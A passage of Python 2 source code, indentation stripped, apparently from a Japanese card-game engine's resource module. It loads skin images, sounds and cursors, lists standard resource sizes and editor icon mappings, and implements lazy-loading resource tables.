"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB"
"BBBB BBBB BBBB BBBB BBBB BBBB",
r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1,128, r1,g1,b1,255, r1,g1,b1,255, r1,g1,b1,255,
r1,g1,b1, 0, r1,g1,b1,196, r1,g1,b1,224, r1,g1,b1,128, r1,g1,b1, 68, r1,g1,b1, 40,
r1,g1,b1,128, r1,g1,b1,224, r1,g1,b1, 68, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0,
r1,g1,b1,255, r1,g1,b1,128, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0,
r1,g1,b1,255, r1,g1,b1, 68, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0,
r1,g1,b1,255, r1,g1,b1, 40, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0, r1,g1,b1, 0
)
hl_topleft = pygame.image.fromstring(linedata, (6, 6), "RGBA")
hl_topright = pygame.transform.flip(hl_topleft, True, False)
hl_bottomleft = pygame.transform.flip(hl_topleft, False, True)
hl_bottomright = pygame.transform.flip(hl_topleft, True, True)
color = (r1, g1, b1)
pygame.draw.line(bmp, color, (2+6, 2), (w-6-3, 2))
pygame.draw.line(bmp, color, (2+6, h-3), (w-6-3, h-3))
pygame.draw.line(bmp, color, (2, 2+6), (2, h-6-3))
pygame.draw.line(bmp, color, (w-3, 2+6), (w-3, h-6-3))
bmp.blit(hl_topleft, (2, 2))
bmp.blit(hl_topright, (w-6-2, 2))
bmp.blit(hl_bottomleft, (2, h-6-2))
bmp.blit(hl_bottomright, (w-6-2, h-6-2))
if flags & SB_NOTICE:
if flags & SB_PRESSED:
bmp.fill((64, 0, 0), special_flags=pygame.locals.BLEND_RGBA_ADD)
else:
bmp.fill((128, 0, 0), special_flags=pygame.locals.BLEND_RGBA_ADD)
bmp.fill((0, 96, 96, 0), special_flags=pygame.locals.BLEND_RGBA_SUB)
# 枠の外の部分を透明にする
Resource.draw_corneroutimg(bmp, outframe=1)
pygame.draw.rect(bmp, (0, 0, 0, 0), (0, 0, w, h), 1)
return bmp
def get_statusbtnbmp(self, sizetype, flags=0):
"""StatusBarで使用するボタン画像を取得する。
sizetype: 0=(120, 22), 1=(27, 27), 2=(632, 33)
flags: 0:通常, SB_PRESSED:押下時, SB_CURRENT:カーソル下,
SB_DISABLE:無効状態, SB_NOTICE:通知
|で組み合わせて指定する。
"""
btn = None
if sizetype == 0:
if flags in self._statusbtnbmp0:
btn = self._statusbtnbmp0[flags]
else:
btn = self._create_statusbtnbmp(cw.s(120), cw.s(22), flags)
self._statusbtnbmp0[flags] = btn
elif sizetype == 1:
if flags in self._statusbtnbmp1:
btn = self._statusbtnbmp1[flags]
else:
btn = self._create_statusbtnbmp(cw.s(26), cw.s(29), flags)
self._statusbtnbmp1[flags] = btn
elif sizetype == 2:
if flags in self._statusbtnbmp2:
btn = self._statusbtnbmp2[flags]
else:
btn = self._create_statusbtnbmp(cw.s(633)+1, cw.s(34), flags)
self._statusbtnbmp2[flags] = btn
return btn.copy() if btn else None
def get_resources(self, func, dpath1, dpath2, ext, mask=None, ss=None, noresize=(), nodbg=False, emptyfunc=None,
editor_res=None, warning=True):
"""
各種リソースデータを辞書で返す。
ファイル名から拡張子を除いたのがkey。
"""
def nokeyfunc(key):
dbg = not nodbg and key.endswith("_dbg")
noscale = key.endswith("_noscale")
up_scr = None
fpath = ""
if dbg:
key = key[:-len("_dbg")]
up_scr = cw.dpi_level
if noscale:
key = key[:-len("_noscale")]
if editor_res:
resname = CWXEDITOR_RESOURCES.get(key, "")
fpath = cw.util.join_paths(editor_res, resname)
if not os.path.isfile(fpath):
fpath = ""
if not fpath and dpath2:
fpath = cw.util.find_resource(cw.util.join_paths(dpath2, key), ext)
if not fpath:
fpath = cw.util.find_resource(cw.util.join_paths(dpath1, key), ext)
if not fpath:
if warning:
def errfunc(dname, key):
if cw.cwpy.frame:
s = u"リソース [%s/%s] が見つかりません。" % (dname, key)
dlg = cw.dialog.message.ErrorMessage(None, s)
dlg.ShowModal()
dlg.Destroy()
cw.cwpy.frame.exec_func(errfunc, os.path.basename(dpath1), key)
return emptyfunc()
if mask is None:
res = func(fpath)
else:
if ss == cw.ppis and func == cw.util.load_wxbmp:
res = func(fpath, mask=mask, can_loaded_scaledimage=True, up_scr=cw.dpi_level)
else:
res = func(fpath, mask=mask, can_loaded_scaledimage=True, up_scr=up_scr)
if not noscale:
if not dbg and ss and not key in noresize:
res = ss(res)
elif dbg and ss:
res = cw.ppis(res)
return res
d = ResourceTable(dpath1, {}.copy(), emptyfunc, nokeyfunc=nokeyfunc)
return d
def get_sounds(self, setting, skinsounds):
"""
システム効果音を読み込んで、
pygameのsoundインスタンスの辞書で返す。
"""
d = ResourceTable("SystemSound", {}.copy(), empty_sound)
for key, sound in setting.sounds.items():
if sound in skinsounds:
f = lambda sound: d.set(key, lambda: skinsounds[sound])
f(sound)
else:
d.set(key, empty_sound)
return d
def get_skinsounds(self):
"""
スキン付属の効果音を読み込んで、
pygameのsoundインスタンスの辞書で返す。
"""
dpath = cw.util.join_paths(self.skindir, "Sound")
d = self.get_resources(cw.util.load_sound, "Data/SkinBase/Sound", dpath, self.ext_snd,
emptyfunc=empty_sound, warning=False)
dpath = cw.util.join_paths(self.skindir, "BgmAndSound")
d2 = self.get_resources(cw.util.load_sound, "Data/SkinBase/BgmAndSound", dpath, self.ext_snd,
emptyfunc=empty_sound, warning=False)
d.merge(d2)
return d
def get_msgs(self, setting):
"""
システムメッセージを辞書で返す。
"""
return setting.msgs
def get_buttons(self):
"""
ダイアログのボタン画像を読み込んで、
wxBitmapのインスタンスの辞書で返す。
"""
dpath = cw.util.join_paths(self.skindir, "Resource/Image/Button")
return self.get_resources(cw.util.load_wxbmp, "Data/SkinBase/Resource/Image/Button", dpath, self.ext_img, True, cw.wins, emptyfunc=empty_wxbmp)
def get_cursors(self):
"""
ダイアログで使用されるカーソルを読み込んで、
wxCursorのインスタンスの辞書で返す。
"""
def get_cursor(name):
fname = name + ".cur"
dpaths = ("Data/SkinBase/Resource/Image/Cursor",
cw.util.join_paths(self.skindir, "Resource/Image/Cursor"))
for dpath in dpaths:
fpath = cw.util.join_paths(dpath, fname)
if os.path.isfile(fpath):
return wx.Cursor(fpath, wx.BITMAP_TYPE_CUR)
if name == "CURSOR_BACK":
return wx.StockCursor(wx.CURSOR_POINT_LEFT)
elif name == "CURSOR_FORE":
return wx.StockCursor(wx.CURSOR_POINT_RIGHT)
elif name == "CURSOR_FINGER":
return wx.StockCursor(wx.CURSOR_HAND)
elif name == "CURSOR_ARROW":
return wx.NullCursor
else:
return wx.NullCursor
d = ResourceTable("Resource/Image/Cursor", {}.copy(), lambda: wx.StockCursor(wx.CURSOR_ARROW), nokeyfunc=get_cursor)
return d
def get_stones(self):
"""
適性・カード残り回数の画像を読み込んで、
pygameのサーフェスの辞書で返す。
"""
dpath = cw.util.join_paths(self.skindir, "Resource/Image/Stone")
return self.get_resources(cw.util.load_image, "Data/SkinBase/Resource/Image/Stone", dpath, self.ext_img, True, cw.s, emptyfunc=empty_image)
def get_wxstones(self):
"""
適性・カード残り回数の画像を読み込んで、
wxBitmapのインスタンスの辞書で返す。
"""
dpath = cw.util.join_paths(self.skindir, "Resource/Image/Stone")
return self.get_resources(cw.util.load_wxbmp, "Data/SkinBase/Resource/Image/Stone", dpath, self.ext_img, True, cw.wins, emptyfunc=empty_wxbmp)
def get_statuses(self, load_image):
"""
ステータス表示に使う画像を読み込んで、
("LIFEGUAGE", "TARGET", "LIFE", "UP*", "DOWN*"はマスクする)
pygameのサーフェスの辞書で返す。
"""
if load_image == cw.util.load_wxbmp:
ss = cw.wins
emptyfunc=empty_wxbmp
else:
ss = cw.s
emptyfunc=empty_image
def load_image2(fpath, mask=False, can_loaded_scaledimage=True, up_scr=None):
fname = os.path.basename(fpath)
key = os.path.splitext(fname)[0]
if key in ("LIFE", "UP0", "UP1", "UP2", "UP3", "DOWN0", "DOWN1", "DOWN2", "DOWN3"):
return load_image(fpath, mask=True, maskpos=(1, 1), can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
elif key == "TARGET":
return load_image(fpath, mask=True, maskpos="right", can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
elif key == "LIFEGUAGE":
return load_image(fpath, mask=True, maskpos=(5, 5), can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
elif key == "LIFEGUAGE2":
return load_image(fpath, mask=True, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
elif key == "LIFEGUAGE2_MASK":
return load_image(fpath, mask=True, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
elif key == "LIFEBAR":
return load_image(fpath, mask=False, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
else:
return load_image(fpath, mask=False, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
dpath = cw.util.join_paths(self.skindir, "Resource/Image/Status")
return self.get_resources(load_image2, "Data/SkinBase/Resource/Image/Status", dpath, self.ext_img, False, ss, emptyfunc=emptyfunc)
def get_dialogs(self, load_image):
"""
ダイアログで使う画像を読み込んで、
wxBitmapのインスタンスの辞書で返す。
"""
if load_image == cw.util.load_wxbmp:
ss = cw.wins
emptyfunc=empty_wxbmp
else:
ss = cw.s
emptyfunc=empty_image
def load_image2(fpath, mask=False, can_loaded_scaledimage=True, up_scr=None):
fname = os.path.basename(fpath)
key = os.path.splitext(fname)[0]
if key in ("LINK", "MONEYY"):
return load_image(fpath, mask=False, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
elif key == "STATUS8":
return load_image(fpath, mask=True, maskpos="right", can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
elif key in ("CAUTION", "INVISIBLE"):
return load_image(fpath, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
else:
return load_image(fpath, mask=mask, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
dpath = cw.util.join_paths(self.skindir, "Resource/Image/Dialog")
return self.get_resources(load_image2, "Data/SkinBase/Resource/Image/Dialog", dpath, self.ext_img, True, ss, emptyfunc=emptyfunc)
def get_debugs(self, load_image, ss):
"""
デバッガで使う画像を読み込んで、
wxBitmapのインスタンスの辞書で返す。
"""
if load_image == cw.util.load_wxbmp:
emptyfunc=empty_wxbmp
else:
emptyfunc=empty_image
dpath = u"Data/Debugger"
# 可能ならcwxeditor/resourceからアイコンを読み込む
editor_res = os.path.dirname(os.path.abspath(self.setting().editor))
editor_res = cw.util.join_paths(editor_res, "resource")
if not os.path.isdir(editor_res):
editor_res = None
return self.get_resources(load_image, dpath, "", cw.M_IMG, True, ss, emptyfunc=emptyfunc, editor_res=editor_res)
def get_cardbgs(self, load_image):
"""
カードの背景画像を読み込んで、pygameのサーフェス
("PREMIER", "RARE", "HOLD", "PENALTY"はマスクする)
の辞書で返す。
"""
if load_image == cw.util.load_wxbmp:
ss = cw.wins
emptyfunc=empty_wxbmp
else:
ss = cw.s
emptyfunc=empty_image
def load_image2(fpath, mask=False, can_loaded_scaledimage=True, up_scr=None):
fname = os.path.basename(fpath)
key = os.path.splitext(fname)[0]
if key in ("HOLD", "PENALTY"):
return load_image(fpath, mask=True, maskpos="center", can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
elif key in ("PREMIER", "RARE"):
return load_image(fpath, mask=True, maskpos="right", can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
else:
return load_image(fpath, mask=mask, can_loaded_scaledimage=can_loaded_scaledimage, up_scr=up_scr)
dpath = cw.util.join_paths(self.skindir, "Resource/Image/CardBg")
return self.get_resources(load_image2, "Data/SkinBase/Resource/Image/CardBg", dpath, self.ext_img, False, ss, nodbg=True, emptyfunc=emptyfunc)
def get_cardnamecolorhints(self, cardbgs):
"""
カードの各台紙について、文字描画領域の色を
平均化した辞書を作成する。
"""
d = ResourceTable("CardBgColorHints", {}.copy(), lambda: 255)
for key in ("ACTION", "BEAST", "BIND", "DANGER", "FAINT", "INFO", "INJURY", "ITEM",
"LARGE", "NORMAL", "OPTION", "PARALY", "PETRIF", "SKILL", "SLEEP"):
f = lambda key: d.set(key, lambda: self.calc_cardnamecolorhint(cardbgs[key]))
f(key)
return d
def calc_cardnamecolorhint(self, bmp):
"""文字描画領域の色を平均化した値を返す。
"""
if bmp.get_width() <= cw.s(10) or bmp.get_height() <= cw.s(20):
return
rect = pygame.Rect(cw.s(5), cw.s(5), bmp.get_width() - cw.s(10), cw.s(15))
sub = bmp.subsurface(rect)
buf = pygame.image.tostring(sub, "RGB")
buf = array.array('B', buf)
rgb = sum(buf) / len(buf)
return rgb
def calc_wxcardnamecolorhint(self, wxbmp):
"""文字描画領域の色を平均化した値を返す。
"""
if wxbmp.GetWidth() <= cw.s(10) or wxbmp.GetHeight() <= cw.s(20):
return
rect = wx.Rect(cw.s(5), cw.s(5), wxbmp.GetWidth() - cw.s(10), cw.s(15))
sub = wxbmp.GetSubBitmap(rect)
buf = array.array('B', '\0' * (rect[2] * rect[3] * 3))
sub.CopyToBuffer(buf, format=wx.BitmapBufferFormat_RGB)
rgb = sum(buf) / len(buf)
return rgb
def get_actioncards(self):
"""
"Resource/Xml/ActionCard"にあるアクションカードを読み込み、
cw.header.CardHeaderインスタンスの辞書で返す。
"""
dpath = cw.util.join_paths(self.skindir, "Resource/Xml/ActionCard")
ext = ".xml"
d = {}
for fname in os.listdir(dpath):
if fname.endswith(ext):
fpath = cw.util.join_paths(dpath, fname)
carddata = cw.data.xml2element(fpath)
header = cw.header.CardHeader(carddata=carddata)
d[header.id] = header
return d
def get_backpackcards(self):
"""
"Resource/Xml/SpecialCard/UseCardInBackpack.xml"のカードを読み込み、
cw.header.CardHeaderインスタンスの辞書で返す。
"""
fpath = cw.util.join_paths(self.skindir, "Resource/Xml/SpecialCard/UseCardInBackpack.xml")
if not os.path.isfile(fpath):
# 旧バージョンのスキンには存在しないのでSkinBaseを使用
fpath = u"Data/SkinBase/Resource/Xml/SpecialCard/UseCardInBackpack.xml"
carddata = cw.data.xml2element(fpath)
d = {}
for cardtype in ("ItemCard", "BeastCard"):
d[cardtype] = cw.header.CardHeader(carddata=carddata, bgtype=cardtype.upper().replace("CARD", ""))
return d
def get_specialchars(self):
"""
特殊文字の画像を読み込んで、
pygameのサーフェスの辞書で返す(特殊文字がkey)
"""
self.specialchars_is_changed = False
dpath = cw.util.join_paths(self.skindir, "Resource/Image/Font")
ndict = {"ANGRY" : "#a",
"CLUB" : "#b",
"DIAMOND" : "#d",
"EASY" : "#e",
"FLY" : "#f",
"GRIEVE" : "#g",
"HEART" : "#h",
"JACK" : "#j",
"KISS" : "#k",
"LAUGH" : "#l",
"NIKO" : "#n",
"ONSEN" : "#o",
"PUZZLE" : "#p",
"QUICK" : "#q",
"SPADE" : "#s",
"WORRY" : "#w",
"X" : "#x",
"ZAP" : "#z",
}
d = ResourceTable("Resource/Image/Font", {}.copy(), empty_image)
def load(key, name):
fpath = cw.util.find_resource(cw.util.join_paths(dpath, key), self.ext_img)
image = cw.util.load_image(fpath, mask=True, can_loaded_scaledimage=True)
return image, False
for key, name in ndict.iteritems():
d.set(name, load, key, name)
return d
# リソースの標準サイズ
SIZE_SPFONT = (22, 22)
SIZE_RESOURCES = {
"Button/ARROW": (16, 16),
"Button/BEAST": (65, 45),
"Button/CAST": (16, 16),
"Button/DECK": (16, 16),
"Button/DOWN": (14, 14),
"Button/ITEM": (65, 45),
"Button/LJUMP": (16, 14),
"Button/LMOVE": (9, 14),
"Button/LSMALL": (9, 9),
"Button/RJUMP": (16, 14),
"Button/RMOVE": (9, 14),
"Button/RSMALL": (9, 9),
"Button/SACK": (16, 16),
"Button/SHELF": (16, 16),
"Button/SKILL": (65, 45),
"Button/TRUSH": (16, 16),
"Button/UP": (14, 14),
"CardBg/ACTION": (80, 110),
"CardBg/BEAST": (80, 110),
"CardBg/BIND": (95, 130),
"CardBg/DANGER": (95, 130),
"CardBg/FAINT": (95, 130),
"CardBg/HOLD": (80, 110),
"CardBg/INFO": (80, 110),
"CardBg/INJURY": (95, 130),
"CardBg/ITEM": (80, 110),
"CardBg/LARGE": (95, 130),
"CardBg/NORMAL": (80, 110),
"CardBg/OPTION": (80, 110),
"CardBg/PARALY": (95, 130),
"CardBg/PENALTY": (80, 110),
"CardBg/PETRIF": (95, 130),
"CardBg/PREMIER": (12, 16),
"CardBg/RARE": (12, 40),
"CardBg/REVERSE": (95, 130),
"CardBg/SKILL": (80, 110),
"CardBg/SLEEP": (95, 130),
"Dialog/CAUTION": (37, 37),
"Dialog/COMPLETE": (100, 100),
"Dialog/FIXED": (26, 26),
"Dialog/FOLDER": (64, 54),
"Dialog/INVISIBLE": (232, 29),
"Dialog/LINK": (20, 20),
"Dialog/MONEYP": (18, 18),
"Dialog/MONEYY": (18, 18),
"Dialog/PAD": (226, 132),
"Dialog/PLAYING": (68, 146),
"Dialog/PLAYING_YADO": (68, 146),
"Dialog/SELECT": (16, 13),
"Dialog/SETTINGS": (16, 16),
"Dialog/STATUS": (220, 56),
"Dialog/STATUS0": (14, 14),
"Dialog/STATUS1": (14, 14),
"Dialog/STATUS2": (14, 14),
"Dialog/STATUS3": (14, 14),
"Dialog/STATUS4": (14, 14),
"Dialog/STATUS5": (14, 14),
"Dialog/STATUS6": (14, 14),
"Dialog/STATUS7": (14, 14),
"Dialog/STATUS8": (14, 14),
"Dialog/STATUS9": (14, 14),
"Dialog/STATUS10": (14, 14),
"Dialog/STATUS11": (14, 14),
"Dialog/STATUS12": (14, 14),
"Dialog/STATUS13": (14, 14),
"Dialog/UTILITY": (128, 24),
"Other/TITLE": (406, 99),
"Other/TITLE_CARD1": (124, 134),
"Other/TITLE_CARD2": (124, 134),
"Other/TITLE_CELL1": (133, 30),
"Other/TITLE_CELL2": (133, 46),
"Other/TITLE_CELL3": (406, 99),
"Status/BODY0": (16, 16),
"Status/BODY1": (16, 16),
"Status/DOWN0": (16, 16),
"Status/DOWN1": (16, 16),
"Status/DOWN2": (16, 16),
"Status/DOWN3": (16, 16),
"Status/LIFE": (16, 16),
"Status/LIFEBAR": (158, 11),
"Status/LIFEGUAGE": (79, 13),
"Status/LIFEGUAGE2": (79, 13),
"Status/LIFEGUAGE2_MASK": (79, 13),
"Status/MAGIC0": (16, 16),
"Status/MAGIC1": (16, 16),
"Status/MAGIC2": (16, 16),
"Status/MAGIC3": (16, 16),
"Status/MIND0": (16, 16),
"Status/MIND1": (16, 16),
"Status/MIND2": (16, 16),
"Status/MIND3": (16, 16),
"Status/MIND4": (16, 16),
"Status/MIND5": (16, 16),
"Status/SUMMON": (16, 16),
"Status/TARGET": (24, 22),
"Status/UP0": (16, 16),
"Status/UP1": (16, 16),
"Status/UP2": (16, 16),
"Status/UP3": (16, 16),
"Stone/HAND0": (14, 14),
"Stone/HAND1": (14, 14),
"Stone/HAND2": (14, 14),
"Stone/HAND3": (14, 14),
"Stone/HAND4": (14, 14),
"Stone/HAND5": (14, 14),
"Stone/HAND6": (14, 14),
"Stone/HAND7": (14, 14),
"Stone/HAND8": (14, 14),
"Stone/HAND9": (14, 14),
}
def get_resourcesize(path):
"""指定されたリソースの標準サイズを返す。"""
dpath = os.path.basename(os.path.dirname(path))
fpath = os.path.splitext(os.path.basename(path))[0]
key = "%s/%s" % (dpath, fpath)
if key in SIZE_RESOURCES:
return SIZE_RESOURCES[key]
else:
return None
# Data/Debuggerとcwxeditor/resource内にあるファイルとの対応表
# 該当無しのリソースはこのテーブルには含まない
CWXEDITOR_RESOURCES = {
"AREA": "area.png",
"BATTLE": "battle.png",
"CARD": "cards.png",
"COMPSTAMP": "end.png",
"COUPON": "coupon_plus.png",
"EDITOR": "cwxeditor.png",
"EVENT": "event_tree.png",
"LOCAL_FLAG": "flag_l.png",
"FRIEND": "cast.png",
"GOSSIP": "gossip.png",
"IGNITION": "def_start.png",
"INFO": "info.png",
"KEYCODE": "key_code.png",
"LOAD": "open.png",
"MEMBER": "party_cards.png",
"MONEY": "money.png",
"PACK": "package.png",
"RECOVERY": "msn_heal.png",
"RESET": "reload.png",
"ROUND": "round.png",
"SAVE": "save.png",
"UPDATE": "refresh.png",
"LOCAL_STEP": "step_l.png",
"LOCAL_VARIANT": "variant_l.png",
"VARIABLES": "flagdir.png",
# Terminal
"EVT_START": "evt_start.png", # スタート
"EVT_START_BATTLE": "evt_battle.png", # バトル開始
"EVT_END": "evt_clear.png", # シナリオクリア
"EVT_END_BADEND": "evt_gameover.png", # 敗北・ゲームオーバー
"EVT_CHANGE_AREA": "evt_area.png", # エリア移動
"EVT_EFFECT_BREAK": "evt_stop.png", # 効果中断
"EVT_LINK_START": "evt_link_s.png", # スタートへのリンク
"EVT_LINK_PACKAGE": "evt_link_p.png", # パッケージへのリンク
# Standard
"EVT_TALK_MESSAGE": "evt_message.png", # メッセージ
"EVT_TALK_DIALOG": "evt_speak.png", # セリフ
"EVT_PLAY_BGM": "evt_bgm.png", # BGM変更
"EVT_PLAY_SOUND": "evt_se.png", # 効果音
"EVT_CHANGE_BGIMAGE": "evt_back.png", # 背景変更
"EVT_ELAPSE_TIME": "evt_time.png", # 時間経過
"EVT_EFFECT": "evt_effect.png", # 効果
"EVT_WAIT": "evt_wait.png", # 空白時間
"EVT_CALL_PACKAGE": "evt_call_p.png", # パッケージのコール
"EVT_CALL_START": "evt_call_s.png", # スタートのコール
"EVT_CHANGE_ENVIRONMENT": "evt_chenv.png", # 状況設定(Wsn.4)
# Data
"EVT_BRANCH_FLAG": "evt_br_flag.png", # フラグ分岐
"EVT_SET_FLAG": "evt_flag_set.png", # フラグ変更
"EVT_REVERSE_FLAG": "evt_flag_r.png", # フラグ反転
"EVT_CHECK_FLAG": "evt_flag_judge.png", # フラグ判定
"EVT_BRANCH_MULTISTEP": "evt_br_step_n.png", # ステップ多岐分岐
"EVT_BRANCH_STEP": "evt_br_step_ul.png", # ステップ上下分岐
"EVT_SET_STEPUP": "evt_step_plus.png", # ステップ増加
"EVT_SET_STEPDOWN": "evt_step_minus.png", # ステップ減少
"EVT_SET_STEP": "evt_step_set.png", # ステップ変更
"EVT_CHECK_STEP": "evt_check_step.png", # ステップ判定
"EVT_BRANCH_FLAGVALUE": "evt_cmpflag.png", # フラグ比較分岐
"EVT_BRANCH_STEPVALUE": "evt_cmpstep.png", # ステップ比較分岐
"EVT_SUBSTITUTE_FLAG": "evt_cpflag.png", # フラグ代入
"EVT_SUBSTITUTE_STEP": "evt_cpstep.png", # ステップ代入
"EVT_SET_VARIANT": "evt_set_var.png", # コモン設定(Wsn.4)
"EVT_BRANCH_VARIANT": "evt_br_var.png", # コモン分岐(Wsn.4)
"EVT_CHECK_VARIANT": "evt_chk_var.png", # コモン判定(Wsn.4)
# Utility
"EVT_BRANCH_SELECT": "evt_br_member.png", # メンバ選択
"EVT_BRANCH_ABILITY": "evt_br_power.png", # 能力判定分岐
"EVT_BRANCH_RANDOM": "evt_br_random.png", # ランダム分岐
"EVT_BRANCH_MULTIRANDOM": "evt_br_multi_random.png", # ランダム多岐分岐
"EVT_BRANCH_LEVEL": "evt_br_level.png", # レベル判定分岐
"EVT_BRANCH_STATUS": "evt_br_state.png", # 状態判定分岐
"EVT_BRANCH_PARTYNUMBER": "evt_br_num.png", # 人数判定
"EVT_BRANCH_AREA": "evt_br_area.png", # エリア分岐
"EVT_BRANCH_BATTLE": "evt_br_battle.png", # バトル分岐
"EVT_BRANCH_ISBATTLE": "evt_br_on_battle.png", # バトル判定分岐
"EVT_BRANCH_ROUND": "evt_br_round.png", # ラウンド分岐
"EVT_BRANCH_RANDOMSELECT": "evt_br_rndsel.png", # ランダム選択
# Branch
"EVT_BRANCH_CAST": "evt_br_cast.png", # キャスト存在分岐
"EVT_BRANCH_ITEM": "evt_br_item.png", # アイテム所持分岐
"EVT_BRANCH_SKILL": "evt_br_skill.png", # スキル所持分岐
"EVT_BRANCH_INFO": "evt_br_info.png", # 情報所持分岐
"EVT_BRANCH_BEAST": "evt_br_beast.png", # 召喚獣存在分岐
"EVT_BRANCH_MONEY": "evt_br_money.png", # 所持金分岐
"EVT_BRANCH_COUPON": "evt_br_coupon.png", # クーポン分岐
"EVT_BRANCH_MULTI_COUPON": "evt_br_multi_coupon.png", # クーポン多岐分岐
"EVT_BRANCH_COMPLETESTAMP": "evt_br_end.png", # 終了済シナリオ分岐
"EVT_BRANCH_GOSSIP": "evt_br_gossip.png", # ゴシップ分岐
"EVT_BRANCH_KEYCODE": "evt_br_keycode.png", # キーコード所持分岐
# Get
"EVT_GET_CAST": "cast.png", # キャスト加入
"EVT_GET_ITEM": "item.png", # アイテム入手
"EVT_GET_SKILL": "skill.png", # スキル取得
"EVT_GET_INFO": "info.png", # 情報入手
"EVT_GET_BEAST": "beast.png", # 召喚獣獲得
"EVT_GET_MONEY": "money.png", # 所持金増加
"EVT_GET_COUPON": "coupon.png", # 称号獲得
"EVT_GET_COMPLETESTAMP": "end.png", # 終了シナリオ設定・貼り紙
"EVT_GET_GOSSIP": "gossip.png", # ゴシップ追加
# Lost
"EVT_LOSE_CAST": "evt_lost_cast.png", # キャスト離脱
"EVT_LOSE_ITEM": "evt_lost_item.png", # アイテム喪失
"EVT_LOSE_SKILL": "evt_lost_skill.png", # スキル喪失
"EVT_LOSE_INFO": "evt_lost_info.png", # 情報喪失
"EVT_LOSE_BEAST": "evt_lost_beast.png", # 召喚獣喪失
"EVT_LOSE_MONEY": "evt_lost_money.png", # 所持金減少
"EVT_LOSE_COUPON": "evt_lost_coupon.png", # クーポン削除
"EVT_LOSE_COMPLETESTAMP": "evt_lost_end.png", # 終了シナリオ削除
"EVT_LOSE_GOSSIP": "evt_lost_gossip.png", # ゴシップ削除
# Visual
"EVT_SHOW_PARTY": "evt_show_party.png", # パーティ表示
"EVT_HIDE_PARTY": "evt_hide_party.png", # パーティ隠蔽
"EVT_MOVE_BGIMAGE": "evt_mv_back.png", # 背景再配置
"EVT_MOVE_CARD": "evt_mv_card.png", # カード再配置
"EVT_REPLACE_BGIMAGE": "evt_rpl_back.png", # 背景置換
"EVT_LOSE_BGIMAGE": "evt_lose_back.png", # 背景削除
"EVT_REDISPLAY": "evt_refresh.png", # 画面の再構築
}
def empty_wxbmp():
"""空のwx.Bitmapを返す。"""
wxbmp = wx.EmptyBitmap(1, 1)
image = wxbmp.ConvertToImage()
r = image.GetRed(0, 0)
g = image.GetGreen(0, 0)
b = image.GetBlue(0, 0)
image.SetMaskColour(r, g, b)
return image.ConvertToBitmap()
def empty_image():
"""空のpygame.Surfaceを返す。"""
image = pygame.Surface((1, 1)).convert()
image.set_colorkey(image.get_at((0, 0)), pygame.locals.RLEACCEL)
return image
def empty_sound():
"""空のcw.util.SoundInterfaceを返す。"""
return cw.util.SoundInterface(None, "")
class LazyResource(object):
def __init__(self, func, args, kwargs):
"""リソースをfunc(*args, **kwargs)によって
遅延読み込みする。
"""
self.func = func
self.args = args
self.kwargs = kwargs
self._res = None
self.load = False
self.failure = False
def clear(self):
self.load = False
self._res = None
def get_res(self):
if not self.load:
try:
self._res = self.func(*self.args, **self.kwargs)
except:
cw.util.print_ex(file=sys.stderr)
self.failure = True
self.load = True
return self._res
class ResourceTable(object):
def __init__(self, name, init={}.copy(), deffunc=None, nokeyfunc=None):
"""文字列をキーとしたリソーステーブル。
各リソースは必要になった時に遅延読み込みされる。
"""
self.name = name
self.dic = init
self.nokeyfunc = nokeyfunc
self.deffunc = deffunc
self.defvalue = None
self.defload = False
def reset(self):
for lazy in self.dic.itervalues():
lazy.clear()
def merge(self, d):
for key, value in self.dic.iteritems():
if not key in self.dic:
self.dic[key] = value
def __getitem__(self, key):
self._put_nokeyvalue(key)
lazy = self.dic.get(key, None)
if lazy:
first = not lazy.load
val = lazy.get_res()
if lazy.failure:
if first:
s = u"リソース [%s/%s] の読み込みに失敗しました。\n" % (self.name, key)
sys.stderr.write(s)
return self.get_defvalue()
else:
return val
else:
if not self.defload:
s = u"リソース [%s/%s] が見つかりません。\n" % (self.name, key)
sys.stderr.write(s)
val = self.get_defvalue()
def get_defvalue(self):
if not self.defload:
self.defvalue = self.deffunc()
self.defload = True
return self.defvalue
def _put_nokeyvalue(self, key):
if self.nokeyfunc and not key in self.dic:
self.dic[key] = LazyResource(lambda: self.nokeyfunc(key), (), {})
def get(self, key, defvalue=None):
self._put_nokeyvalue(key)
if key in self.dic:
return self[key]
return defvalue
def set(self, key, func, *args, **kwargs):
self.dic[key] = LazyResource(func, args, kwargs)
def __contains__(self, key):
self._put_nokeyvalue(key)
return key in self.dic
def copy(self):
tbl = ResourceTable(self.name, self.dic.copy(), self.deffunc, self.nokeyfunc)
tbl.defvalue = self.defvalue
tbl.defload = self.defload
return tbl
def iterkeys(self):
for key in self.dic.iterkeys():
yield key
def is_loaded(self, key):
self._put_nokeyvalue(key)
return self.dic[key].load
class RecentHistory(object):
def __init__(self, tempdir):
"""起動してから開いたシナリオの情報を
(wsn・zipファイルのパス, 最終更新日, "Data/Temp"に展開したフォルダパス)の
形式で保存し、管理するクラス。
古い順から"Data/Temp"のフォルダを削除していく。
tempdir: シナリオの一時展開先
"""
self.scelist = []
temppaths = set()
limit = cw.cwpy.setting.recenthistory_limit
fpath = cw.util.join_paths(tempdir, "RecentHistory.xml")
if os.path.isfile(fpath):
self.data = cw.data.xml2etree(fpath)
else:
